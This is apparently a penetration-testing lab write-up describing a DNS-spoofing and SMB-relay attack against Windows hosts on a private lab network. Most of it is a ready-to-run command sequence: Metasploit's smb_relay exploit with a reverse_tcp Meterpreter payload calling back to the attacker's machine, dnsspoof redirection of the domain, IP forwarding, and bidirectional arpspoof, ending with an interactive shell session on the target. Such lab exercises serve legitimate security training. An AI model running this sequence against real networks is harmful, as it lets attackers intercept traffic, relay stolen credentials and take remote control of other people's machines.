DNS & SMB Relay Attack

Launch an attack using the SMB Relay Exploit in a way that once the Client (172.16.5.5) issues a SMB connection to any hosts on the .sportsfoo.com domain it can be redirected to your Metasploit server, and then you can use its credentials to get a shell on the target machine (172.16.5.10*).

This is a graphic that represents how this attack should work:

1. Client (Windows 7) issues a SMB connection to [\\fileserver.sportsfoo.com\finance$] at every 30 seconds or so.

2. The attacker machine intercepts this request and spoofs the IP address of fileserver.sportsfoo.com.

3. Then the Windows 7 system issues a SMB connection to [\\172.16.5.101] (attacker machine) instead of using the real IP of the fileserver.sportsfoo.com.

4. The SMB Relay exploit is already listening, receives the SMB connection, and relays the authentication to the target machine. The payload is a Windows Meterpreter shell.

5. Once the exploit authenticates on the target machine, a reverse meterpreter session is provided to the pentester.

Writeup

msfconsole
use exploit/windows/smb/smb_relay
set SRVHOST 172.16.5.101
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.5.101
set LHOST 172.16.5.101
set SMBHOST 172.16.5.10
run

echo "172.16.5.101 *.sportsfoo.com" > dns
dnsspoof -i eth1 -f dns

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 172.16.5.5 172.16.5.1
arpspoof -i eth1 -t 172.16.5.1 172.16.5.5

sessions
sessions -i 1
getuid